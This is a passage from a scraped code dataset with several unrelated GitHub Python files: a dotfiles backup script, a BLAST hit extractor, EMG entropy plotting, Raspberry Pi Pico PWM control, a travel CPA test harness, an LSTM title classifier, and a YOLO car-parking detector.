datetime.datetime.now().strftime(\"%Y.%m.%d-%H.%M\")\n target_dir = ARCHIVE.replace(\"~\", HOME_DIR)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n filename = \"dotfiles-\" + time\n dest_path = os.path.join(target_dir, filename)\n dest_path = os.path.abspath(dest_path)\n print(COLORS[\"_\"] % \" \" + dest_path + \".zip\")\n shutil.make_archive(dest_path, \"zip\", DOTS_DIR)\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef restore():\n \"\"\" Copy content of this repo to destinition paths.\n \"\"\"\n pass\n\n\ndef help_msg():\n \"\"\" Prints help message.\n \"\"\"\n print(\"\"\"\n Commands:\n dots.py backup - Parse listed paths and copy it's content to this repo\n with storing previous version.\n dots.py restore username - Copy content of this repo to destination paths.\n\"\"\")\n\n\nif \"backup\" in sys.argv:\n backup()\nelif \"restore\" in sys.argv:\n restore()\nelse:\n help_msg()\n","repo_name":"mbnuqw/dotfiles","sub_path":"dots.py","file_name":"dots.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41405401890","text":"# #!/bin/python\n\nimport sys, os\nfrom Bio import SeqIO\nblast_file = sys.argv[1]\nfasta_file = sys.argv[2]\noutput_file = sys.argv[3]\n\n\n\nid_blast=[]\nwith open(blast_file) as f:\n for line in f:\n id_blast.append(line.split()[0])\n id_blast=set(id_blast)\n id_blast=list(id_blast)\n\nfasta_sequences = SeqIO.parse(open(fasta_file),'fasta')\nwith open(output_file, \"w\") as f:\n for seq in fasta_sequences:\n if seq.id in id_blast:\n SeqIO.write([seq], f, \"fasta\")\n","repo_name":"Aexbrayat/snakevir","sub_path":"snakevirome/scripts/extract_blast_hits.py","file_name":"extract_blast_hits.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29627936380","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport ApEn\nimport SampEn\nimport mean\nimport TKE\nimport envelope\n\nN = 64 # 滑动窗大小\nr = 0.2\n#\narr = np.loadtxt(\"E:\\\\嵌入式肌电手\\\\肌电数据\\\\谢志亮emg数据\\\\emg_data.txt\")\narr_CB = arr[:, 2]\n\n# arr_CB = arr_CB - np.mean(arr_CB) # 去中心化\n\n\ndef emgApEn(arr, m, r):\n std_all = np.std(arr)\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n # std_single = np.std(arr_fram,axis=0)\n arr_ApEn = [ApEn.ApEn(x, m, r*std_all) for x in arr_fram]\n return arr_ApEn\n\n\ndef emgSampEn(arr, m, r):\n std_all = np.std(arr)\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n arr_SampEn = [SampEn.SampEn(x, m, r*std_all) for x in arr_fram]\n return arr_SampEn\n\n\ndef emgSlidMean(arr):\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n arr_slideMean = [mean.slidMean(x) for x in arr_fram] \n return arr_slideMean\n\n\ndef emgTke(U):\n arr_TKE = TKE.tke(U)\n return arr_TKE\n\n\ndef emgEnvelop(U):\n arr_envelop = envelope.envelop(U)\n return arr_envelop\n\n\nplt.figure('原始数据')\nplt.title('source')\nplt.plot(arr_CB)\nplt.savefig(\"source.jpg\")\n\nplt.figure(\"傅里叶\")\nplt.plot(np.fft.fft(arr_CB))\n\nplt.figure(\"ApEn\")\nplt.title('ApEn r=0.2')\nplt.plot(emgApEn(arr_CB, 2, r))\nplt.savefig(\"ApEn.jpg\")\n\nplt.figure(\"SampEn\")\nplt.title(\"SampEn r=0.2\")\nplt.plot(emgSampEn(arr_CB, 2, r))\nplt.savefig(\"SampEn.jpg\")\n\nplt.figure(\"slideMean\")\nplt.title(\"slideMean\")\nplt.plot(emgSlidMean(arr_CB))\nplt.savefig(\"slideMean.jpg\")\n\n\nplt.figure(\"TKE\")\nplt.title(\"TKE\")\nplt.plot(emgTke(arr_CB))\nplt.savefig(\"TKE.jpg\")\n\nplt.figure(\"envelop\")\nplt.title(\"envelop\")\nplt.plot(emgEnvelop(arr_CB))\nplt.savefig(\"envelop.jpg\")\n\nplt.show()","repo_name":"duantao74520/xhand","sub_path":"嵌入式肌电手/算法代码/近似熵/Emg近似熵.py","file_name":"Emg近似熵.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73442491434","text":"# https://www.settorezero.com\n# Raspberry Pi Pico - esempio PWM\n# Regola Duty PWM con un trimmer sul pin 34 (GP28 = ADC2)\n# Utilizzato Slice 0, uscita PWM su pin 21 (GP16)\n# L'altra uscita dello slice 0 (GP17) non è usata e usata come normale GPIO, a livello basso\n# Utilizzato un display Oled 128x32 su I2C (GP9=SCL, GP8=SDA)\n\nfrom machine import Pin, PWM, I2C, ADC\nfrom ssd1306 import SSD1306_I2C\nimport framebuf\nfrom utime import sleep\n\n# set-up display oled\nWIDTH=128\nHEIGHT=32\ni2c=I2C(0) # Inizializza I2C con settaggi default modulo I2C0, SCL=Pin(GP9), SDA=Pin(GP8)\noled=SSD1306_I2C(WIDTH, HEIGHT, i2c)\noled.fill(0)\noled.text(\"Test PWM\",0,0)\noled.text(\"Duty: \",0,8)\noled.show()\n\npwm=PWM(Pin(16)) # GP16\npwm.freq(150000) # 150kHz\npwm.duty_u16(0) # duty cycle iniziale a 0\ngpio = Pin(17, Pin.OUT) #GP17 usato come normale I/O\ngpio.value(0) # GP17 a livello basso\n\ntrimmer=ADC(Pin(28)) #GP28, pin 34\nmedie=500 # numero di valori letti dal trimmer su cui fare la media\ntrimread=0\ni=0\n\nwhile True:\n trimread+=trimmer.read_u16()\n i+=1\n if (i==medie):\n trimread/=medie\n trimread=int(trimread)\n \n # riporto il valore medio del trimmer a percentuale\n percent=int((trimread/65000)*100)\n if (percent>100):\n percent=100\n \n # scrivo sul display\n oled.fill_rect(56, 8, 50, 8, 0) # cancello la parte precedente col valore di Duty\n oled.text(str(int(percent))+\"%\",56,8)\n oled.show()\n \n # riporto la percentuale come valore a 16bit da assegnare al duty cycle\n duty=(65535*percent)/100\n pwm.duty_u16(int(duty))\n \n # azzero le variabili usate per fare la media\n i=0\n trimread=0\n sleep(0.1)","repo_name":"Cyb3rn0id/Raspberry-Pi-Pico-Studies","sub_path":"pico/pwm/pwm1.py","file_name":"pwm1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"it","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"461401379","text":"# -*- coding: utf-8 -*-\n\nfrom copy import copy\nimport os\nimport tarfile\n\nfrom yatest.common import network\nimport yatest.common as common\n\nfrom travel.cpa.lib.lb_writer import LBWriter\n\nfrom data import LabelAvia, LabelHotels, LabelTrain, LabelSuburban, LabelBuses, LabelTours, Snapshot\n\n\nSTOP_WORD = 'PLEASE_STOP'\n\nBREAKER_LABEL_AVIA = LabelAvia.default().replace(marker=STOP_WORD)\n\nBREAKER_LABEL_HOTELS = LabelHotels.default().replace(Label=STOP_WORD)\n\nBREAKER_LABEL_TRAIN = LabelTrain.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_SUBURBAN = LabelSuburban.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_BUSES = LabelBuses.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_TOURS = LabelTours.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_SNAPSHOT = Snapshot.default().replace(hash=STOP_WORD)\n\n\nclass FlowApp(object):\n topic_label_avia = 'topic_label_avia'\n topic_label_hotels = 'topic_label_hotels'\n topic_label_train = 'topic_label_train'\n topic_label_suburban = 'topic_label_suburban'\n topic_label_buses = 'topic_label_buses'\n topic_label_tours = 'topic_label_tours'\n topic_snapshot = 'topic_snapshot'\n\n def __init__(self, yt_helper):\n self.yt_helper = yt_helper\n self.lb_grpc_port = int(os.getenv('LOGBROKER_PORT'))\n\n def run_app(self, processed_snapshots, saved_snapshots, purgatory_items, labels_to_send, snapshots_to_send):\n self.yt_helper.create_tables()\n self.yt_helper.write_snapshots(processed_snapshots, 'processed_snapshots')\n self.yt_helper.write_snapshots(saved_snapshots, 'snapshots')\n self.yt_helper.write_purgatory_items(purgatory_items, 'order_purgatory')\n\n self._send_to_lb(labels_to_send, snapshots_to_send)\n\n bin_root = common.binary_path('travel/cpa/data_processing/flow')\n self._extract_libraries(bin_root)\n\n with network.PortManager() as pm:\n http_port = pm.get_port()\n self._prepare_properties(bin_root, http_port)\n os.chdir(bin_root)\n common.execute(self._get_java_args(bin_root), wait=True)\n\n def _send_to_lb(self, labels_to_send, snapshots_to_send):\n snapshots_to_send = copy(snapshots_to_send)\n snapshots_to_send.append(BREAKER_SNAPSHOT)\n\n writer = LBWriter('localhost', self.lb_grpc_port, 'test_id', None)\n\n labels_avia = labels_to_send['avia']\n labels_avia.append([BREAKER_LABEL_AVIA])\n writer.write(self.topic_label_avia, self._convert_messages(labels_avia))\n\n labels_hotels = labels_to_send['hotels']\n labels_hotels.append([BREAKER_LABEL_HOTELS])\n writer.write(self.topic_label_hotels, self._convert_messages(labels_hotels))\n\n labels_train = labels_to_send['train']\n labels_train.append([BREAKER_LABEL_TRAIN])\n writer.write(self.topic_label_train, self._convert_messages(labels_train))\n\n labels_suburban = labels_to_send['suburban']\n labels_suburban.append([BREAKER_LABEL_SUBURBAN])\n writer.write(self.topic_label_suburban, self._convert_messages(labels_suburban))\n\n labels_buses = labels_to_send['buses']\n labels_buses.append([BREAKER_LABEL_BUSES])\n writer.write(self.topic_label_buses, self._convert_messages(labels_buses))\n\n labels_tours = labels_to_send['tours']\n labels_tours.append([BREAKER_LABEL_TOURS])\n writer.write(self.topic_label_tours, self._convert_messages(labels_tours))\n\n writer.write(self.topic_snapshot, [item.as_dict() for item in snapshots_to_send])\n\n @staticmethod\n def _convert_messages(messages):\n converted_messages = list()\n for message in messages:\n converted_messages.append([item.as_dict() for item in message])\n return converted_messages\n\n @staticmethod\n def _extract_libraries(bin_root):\n # JAVA_PROGRAM classpath is delivered as directory with files when `YMAKE_JAVA_MODULES==yes` rather then\n # tar archive.\n if os.path.isdir(os.path.join(bin_root, 'travel-cpa-flow')):\n return\n tar_path = os.path.join(bin_root, 'travel-cpa-flow.tar')\n tar_target = os.path.join(bin_root, 'travel-cpa-flow')\n with tarfile.open(tar_path) as f:\n f.extractall(tar_target)\n\n def _prepare_properties(self, bin_root, http_port):\n properties_template_path = common.source_path('travel/cpa/tests/flow/application_properties_template.yml')\n with open(properties_template_path) as f:\n properties_template = f.read()\n properties = properties_template.format(\n http_port=http_port,\n lb_port=self.lb_grpc_port,\n yt_proxy=self.yt_helper.yt_proxy,\n yt_root=self.yt_helper.yt_root,\n )\n\n cfg_path = os.path.join(bin_root, 'application-tests.yml')\n with open(cfg_path, 'w') as f:\n f.write(properties)\n\n @staticmethod\n def _get_java_args(bin_root):\n args_template_path = common.source_path('travel/cpa/tests/flow/java_args_template.txt')\n with open(args_template_path) as f:\n args_template = f.read()\n args_text = args_template.format(\n java_bin=common.java_bin(),\n log_dir=common.output_path('app-logs'),\n lib_dir=os.path.join(bin_root, 'travel-cpa-flow'),\n )\n return args_text.split('\\n')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/flow/flow_app.py","file_name":"flow_app.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9488156552","text":"import re\nimport spacy\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\nimport os\n\nfrom torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport gensim\nimport random\nimport math\nimport itertools\nimport pykrylov as krylov\nfrom .config import parser\nfrom .utils import process_df, save_ckpt\nfrom torch.utils.tensorboard import SummaryWriter\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\n\ndef tokenize_title(text, tokenizer):\n text = text.lower()\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n # Clean text from special characters\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n text = \" \".join(text.split())\n return text\n\n\nclass LSTMClassifier(nn.Module):\n\n # define all the layers used in model\n def __init__(self, vocab_size, embedding_dim, hidden_dim, n_layers, bidirectional, dropout, number_of_classes,\n pad_token_id):\n # Constructor\n super().__init__()\n # embedding layer\n # pre_trained_emb = torch.FloatTensor(text_field.vocab.vectors)\n # self.embedding = nn.Embedding.from_pretrained(pre_trained_emb)\n self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=pad_token_id)\n # lstm layer\n self.hidden_dim = hidden_dim\n self.num_layers = n_layers\n self.bidirectional = bidirectional\n self.lstm = nn.LSTM(input_size=embedding_dim,\n hidden_size=hidden_dim,\n num_layers=n_layers,\n bidirectional=self.bidirectional,\n dropout=dropout,\n batch_first=True)\n\n # dense layer\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, number_of_classes)\n else:\n self.fc = nn.Linear(hidden_dim, number_of_classes)\n # activation function\n # self.sigmoid = nn.Sigmoid()\n\n def forward(self, text, text_lengths):\n # text = [batch size,sent_length]\n embedded = self.embedding(text)\n # embedded = [batch size, sent_len, emb dim]\n\n # packed sequence\n packed_input = pack_padded_sequence(embedded, text_lengths.cpu(), batch_first=True)\n with torch.backends.cudnn.flags(enabled=False):\n packed_output, (hidden, cell) = self.lstm(packed_input)\n # hidden = [batch size, num layers * num directions,hid dim]\n # cell = [batch size, num layers * num directions,hid dim]\n\n if self.bidirectional:\n # concat the final forward and backward hidden state\n hidden = torch.cat((hidden[self.num_layers - 1, :, :], hidden[-1, :, :]), dim=1)\n else:\n hidden = hidden[-1, :, :]\n # hidden = [batch size, hid dim * num directions]\n dense_outputs = self.fc(hidden)\n return dense_outputs\n\n\n\nclass PadSequence:\n def __init__(self, pad_token_id=0):\n self.pad_token_id = pad_token_id\n\n def __call__(self, batch):\n sorted_batch = sorted(batch, key=lambda x: len(x['text']), reverse=True)\n sequences = [torch.LongTensor(x['text']) for x in sorted_batch]\n sequences_padded = torch.nn.utils.rnn.pad_sequence(sequences, batch_first=True, padding_value=self.pad_token_id)\n lengths = torch.LongTensor([len(x) for x in sequences])\n labels = torch.LongTensor([x['label'] for x in sorted_batch])\n return sequences_padded, lengths, labels\n\nclass LSTMTitlesDataset(Dataset):\n\n def __init__(self, df, input_col, label_col, vocab_index, unk_token_id):\n self.df = df\n self.input_col = input_col\n self.label_col = label_col\n self.spacy_tokenizer = spacy.blank(\"en\")\n self.vocab_index = vocab_index\n self.unk_token_id = unk_token_id\n\n def tokenize_title(self, text):\n text = text.lower()\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in self.spacy_tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n tokens = text.split()\n if len(tokens) == 0:\n return [self.unk_token_id]\n return [self.vocab_index[token] if token in self.vocab_index else self.unk_token_id for token in tokens]\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, index):\n row = self.df.iloc[index]\n title = row[self.input_col]\n label = row[self.label_col]\n\n return {'text': self.tokenize_title(title), 'label': label}\n\n\n\n\n\nclass LSTMPrefixTitlesDataset(Dataset):\n\n def __init__(self, df, input_col, label_col, vocab_index, unk_token_id,random_=True):\n self.df = df\n self.input_col = input_col\n self.label_col = label_col\n self.spacy_tokenizer = spacy.blank(\"en\")\n self.vocab_index = vocab_index\n self.unk_token_id = unk_token_id\n self.random=random_\n\n def tokenize_title(self, text):\n text = text.lower()\n\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in self.spacy_tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n tokens = text.split()\n if len(tokens) == 0:\n return [self.unk_token_id]\n return [self.vocab_index[token] if token in self.vocab_index else self.unk_token_id for token in tokens]\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, index):\n row = self.df.iloc[index]\n title = row[self.input_col]\n if self.random:\n tokens = self.spacy_tokenizer(title) # Does not preprocess for alignment with BERT\n length = len(tokens)\n max_index = math.floor(length / 2)\n rand_index = random.randint(1, max_index)\n prefix = tokens[:rand_index].text\n else:\n prefix=title\n\n label = row[self.label_col]\n\n return {'text': self.tokenize_title(prefix), 'label': label}\n\n\ndef train_model(model,\n checkpoint_name,\n train_loader,\n valid_loader,\n optimizer,\n num_epochs=10,\n device=torch.device('cuda'),\n log_dir=\"./\"\n ):\n LSTM_MODEL_DIR = \"/data/ebay/data/ggoren/etr_models/\"\n MIN_DELTA = 0.05\n PATIENCE = 2\n\n criterion = nn.CrossEntropyLoss()\n global_step = 0\n termination = False\n\n writer = SummaryWriter(\n log_dir=os.path.join(log_dir, checkpoint_name))\n total_steps = num_epochs * len(train_loader)\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps=1e4,\n num_training_steps=total_steps)\n # training loop\n for epoch_i in range(num_epochs):\n model.train()\n\n if termination:\n print(\"No improvement in validation loss, terminating\")\n break\n\n total_train_loss = 0\n total_bs_train = 0\n for batch in train_loader:\n titles, titles_len, labels = batch\n labels = labels.to(device)\n titles = titles.to(device)\n titles_len = titles_len.to(device)\n outputs = model(titles, titles_len)\n loss = criterion(outputs, labels)\n writer.add_scalar(\"Loss/train\", loss.item(), global_step)\n total_train_loss += (loss.item() * len(labels))\n total_bs_train += len(labels)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n # update running values\n global_step += 1\n\n avg_train_loss = total_train_loss / total_bs_train\n print(\"\")\n print(\" Average training loss: {}\".format(avg_train_loss), flush=True)\n\n print(\"\")\n print(\"Running Validation...\")\n\n total_eval_loss = 0\n total_bs = 0\n all_labels = []\n all_preds = []\n # Evaluate data for one epoch\n model.eval()\n\n for batch in valid_loader:\n with torch.no_grad():\n titles, titles_len, labels = batch\n titles = titles.to(device)\n titles_len = titles_len.to(device)\n labels = labels.to(device)\n outputs = model(titles, titles_len)\n loss = criterion(outputs, labels)\n total_eval_loss += (loss.item() * len(labels))\n total_bs += len(labels)\n\n predicted_labels = outputs.argmax(dim=-1)\n all_preds.extend(list(predicted_labels.cpu().numpy()))\n all_labels.extend(list(labels.cpu().numpy()))\n avg_val_loss = total_eval_loss / total_bs\n writer.add_scalar(\"Loss/dev\", avg_val_loss, epoch_i)\n acc = np.mean([1 if i == j else 0 for i, j in zip(all_preds, all_labels)])\n writer.add_scalar(\"Accuracy/dev\", acc, epoch_i)\n print(\" Validation Loss: {}\".format(avg_val_loss), flush=True)\n print(\" Validation classification accuracy: {}\".format(acc), flush=True)\n\n if epoch_i == 0:\n BEST = avg_val_loss\n LOWEST_LOSS = avg_val_loss\n BEST_ACC = acc\n save_ckpt(LSTM_MODEL_DIR, model, checkpoint_name + 'best_acc')\n continue\n else:\n if BEST_ACC < acc:\n save_ckpt(LSTM_MODEL_DIR, model, checkpoint_name + 'best_acc')\n BEST_ACC = acc\n if avg_val_loss < LOWEST_LOSS:\n LOWEST_LOSS = avg_val_loss\n\n if BEST - MIN_DELTA <= avg_val_loss:\n PATIENCE -= 1\n if PATIENCE == 0:\n termination = True\n else:\n PATIENCE = 2\n BEST = avg_val_loss\n writer.close()\n print('Finished Training!')\n print(\"BEST ACC\", BEST_ACC)\n\n\n\ndef instantiate_train_amazon(configuration, seed,hparams):\n hidden_size, learning_rate, batch_size, dropout, num_layers, wd, window_size = configuration\n\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n nlp = spacy.blank(\"en\")\n device = torch.device('cuda')\n\n w2v_model = gensim.models.KeyedVectors.load(hparams.w2v_model_path)\n word2vec_vectors = list(w2v_model.vectors)\n vocab_size = len(w2v_model.index_to_key) + 2\n\n embedding_dim = w2v_model.vector_size\n\n word2vec_vectors.append(np.random.normal(scale=1.0, size=(embedding_dim,)))\n word2vec_vectors.append(np.zeros(shape=(embedding_dim,)))\n\n bidirection = True\n\n train = pd.read_csv(hparams.train_dataset_path,\n keep_default_na=False,\n na_values=['$$$__$$$'])\n\n dev = pd.read_csv(hparams.dev_dataset_path,\n keep_default_na=False,\n na_values=['$$$__$$$'])\n\n train['title'] = train['title'].apply(lambda x: \" \".join(x.split()))\n dev['title'] = dev['title'].apply(lambda x: \" \".join(x.split()))\n\n train = process_df(train, nlp)\n dev = process_df(dev, nlp)\n\n number_of_classes = train['label'].nunique()\n\n if hparams.mode=='random':\n train_dl = DataLoader(LSTMPrefixTitlesDataset(train, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, shuffle=True,\n collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n dev_dl = DataLoader(\n LSTMPrefixTitlesDataset(dev, \"title\", \"label\", w2v_model.key_to_index, unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n lstm_model = LSTMClassifier(vocab_size, embedding_dim, hidden_size, num_layers, bidirection, dropout,\n number_of_classes, pad_token_id=len(word2vec_vectors) - 1)\n else:\n train_dl = DataLoader(LSTMTitlesDataset(train, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, shuffle=True,\n collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n dev_dl = DataLoader(\n LSTMTitlesDataset(dev, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n lstm_model = LSTMClassifier(vocab_size, embedding_dim, hidden_size, num_layers, bidirection, dropout,\n number_of_classes, pad_token_id=len(word2vec_vectors) - 1)\n\n word2vec_vectors = torch.FloatTensor(word2vec_vectors)\n\n lstm_model.embedding.load_state_dict({\"weight\": word2vec_vectors})\n lstm_model = lstm_model.to(device)\n\n optimizer = AdamW(lstm_model.parameters(), lr=learning_rate, eps=1e-6, weight_decay=wd)\n\n checkpoint_name = \"lstm_prefix_etr_amazon_\" + \"_\".join(\n [str(seed), str(batch_size), str(wd), str(learning_rate), str(dropout), str(num_layers), str(window_size)])\n\n train_model(lstm_model, checkpoint_name, train_dl, dev_dl, optimizer, num_epochs=hparams.num_epochs,\n log_dir=hparams.tensorboard_log_dir, device=device)\n\n\n\n\n\n\n\ndef training_wrapper_amazon(seed,hparams):\n window_sizes = [4,6]\n hidden_size = [384, ]\n learning_rate = [0.01, 0.001, 0.0001, 1e-5, 3e-5, 5e-5]\n batch_size = [64]\n dropout = [0.1, ]\n num_layers = [1]\n weight_decay = [0.01, ]\n\n configurations = list(\n itertools.product(hidden_size, learning_rate, batch_size, dropout, num_layers, weight_decay, window_sizes))\n\n for config in configurations:\n instantiate_train_amazon(config, seed, hparams)\n\nif __name__ == \"__main__\":\n hparams = parser.parse_args()\n training_wrapper_amazon(9001,hparams)\n","repo_name":"titleprefixes/prefixes_code","sub_path":"lstm_prefix_titles.py","file_name":"lstm_prefix_titles.py","file_ext":"py","file_size_in_byte":14661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28540635688","text":"from yolov3.utils import Load_Yolo_model, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names\nfrom yolov3.configs import *\nfrom deep_sort import nn_matching\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker\nfrom deep_sort import generate_detections as gdet\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom shapely.geometry import Polygon , box\n\n#Check out demo_yolo.py for explanation on how to set the model up\n\n#Object Tracking links\n# https://www.pyimagesearch.com/2018/07/23/simple-object-tracking-with-opencv/\n# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/\n# http://davheld.github.io/GOTURN/GOTURN.html\n\nclass spotObject:\n def __init__(self, index, polygon): \n self.index = index \n self.polygon = polygon\n self.isOccupied = False\n\nclass carDetector:\n\n def __init__(self):\n self.prevFrame = None #Store previous frame, don't know if we'll need this\n self.boundingBoxes = [] #Store bounding boxes of previous frame, will likely need this for object tracking\n self.currFrame = None\n self.openParkingSpots = []\n self.assignedParkingSpots=[]\n self.occupiedParkingSpots=[]\n self.matched = []\n self.matchedCars = []\n\n #Threshold of what is a car\n self.thresh = 0.7\n self.input_size = YOLO_INPUT_SIZE\n self.iou_threshold=0.45\n\n self.NUM_CLASS = read_class_names(YOLO_COCO_CLASSES)\n self.key_list = list(self.NUM_CLASS.keys()) \n self.val_list = list(self.NUM_CLASS.values())\n self.Track_only = [\"car\", \"truck\"]\n\n #Creating deep sort object, these parameters can be massaged\n max_cosine_distance = 0.7\n nn_budget = None\n model_filename = 'model_data/mars-small128.pb'\n self.encoder = gdet.create_box_encoder(model_filename, batch_size=1)\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n self.tracker = Tracker(metric)\n\n #Creating our model, we can change this to other models if needed. Check model zoo online for more.\n vid = cv2.VideoCapture('../footage/TrimmedVid.mp4')\n width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = int(vid.get(cv2.CAP_PROP_FPS))\n self.cvModel = Load_Yolo_model()\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.out = cv2.VideoWriter('../footage/TrimmedVidDemo.mp4', fourcc, fps, (width, height), 1) # output_path must be .mp4\n print(\"init carDetector\")\n\n\n def get_bounding_box_iou(self, box1, box2):\n\n left=max(box1[0], box2[0])\n top=max(box1[1], box2[1])\n right=min(box1[2], box2[2])\n bottom=min(box1[3], box2[3])\n\n if(right 0.25):\n return True\n return False\n\n def get_spots(self, spotsArray):\n i = 0\n print(self.openParkingSpots)\n for spot in spotsArray:\n self.openParkingSpots.append(spotObject(i, spot))\n i = i+1\n \n\n def matchCar(self, carID):\n if(len(self.openParkingSpots ) < 1):\n print(\"No Open Spots\")\n return\n if(carID in self.matchedCars):\n print(\"Car already matched\")\n return\n else:\n selectedSpot = self.openParkingSpots.pop()\n newMatch = (selectedSpot.index, carID)\n self.matched.append(newMatch)\n self.matchedCars.append(carID)\n self.assignedParkingSpots.append(selectedSpot)\n print(self.matched)\n\n\n def convertBbToPolygon(self, bbox):\n poly = box(bbox[0], bbox[1], bbox[2], bbox[3], True)\n return poly\n print(\"Poly\")\n\n def convertPolygonToBb(self, poly):\n print(\"Bb\")\n\n def get_cars(self, inputFrame):\n self.currFrame = inputFrame\n\n original_frame = cv2.cvtColor(self.currFrame, cv2.COLOR_BGR2RGB)\n original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)\n\n image_data = image_preprocess(np.copy(original_frame), [self.input_size, self.input_size])\n #image_data = tf.expand_dims(image_data, 0)\n image_data = image_data[np.newaxis, ...].astype(np.float32)\n\n #Detect cars here\n pred_bbox = self.cvModel(image_data)\n\n pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\n pred_bbox = tf.concat(pred_bbox, axis=0)\n\n bboxes = postprocess_boxes(pred_bbox, original_frame, self.input_size, self.thresh)\n bboxes = nms(bboxes, self.iou_threshold, method='nms')\n\n # extract bboxes to boxes (x, y, width, height), scores and names\n boxes, scores, names = [], [], []\n for bbox in bboxes:\n if len(self.Track_only) !=0 and self.NUM_CLASS[int(bbox[5])] in self.Track_only or len(self.Track_only) == 0:\n boxes.append([bbox[0].astype(int), bbox[1].astype(int), bbox[2].astype(int)-bbox[0].astype(int), bbox[3].astype(int)-bbox[1].astype(int)])\n scores.append(bbox[4])\n names.append(self.NUM_CLASS[int(bbox[5])])\n\n #Match objects between frames\n finalBoxes = np.array(boxes) \n finalNames = np.array(names)\n finalScores = np.array(scores)\n features = np.array(self.encoder(original_frame, finalBoxes))\n detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(finalBoxes, finalScores, finalNames, features)]\n\n self.tracker.predict()\n self.tracker.update(detections)\n\n #Set new bounding boxes with IDs\n tracked_bboxes = []\n for track in self.tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 5:\n continue \n bbox = track.to_tlbr() # Get the corrected/predicted bounding box\n class_name = track.get_class() #Get the class name of particular object\n tracking_id = track.track_id # Get the ID for the particular track\n index = self.key_list[self.val_list.index(class_name)] # Get predicted object index by object name\n tracked_bboxes.append( bbox.tolist() + [tracking_id, index] ) # Structure data, that we could use it with our draw_bbox function\n\n self.prevFrame = self.currFrame\n image = draw_bbox(original_frame, tracked_bboxes, CLASSES=YOLO_COCO_CLASSES, tracking=True)\n cv2.imwrite(\"../footage/newimage.jpg\", image)\n self.markSpots()\n self.boundingBoxes = tracked_bboxes\n #Return bounding boxes with carIDs to broker\n return tracked_bboxes\n\n def get_car_image(self, inputID):\n for box in self.boundingBoxes:\n if(box[4] == inputID):\n verticies = np.array( 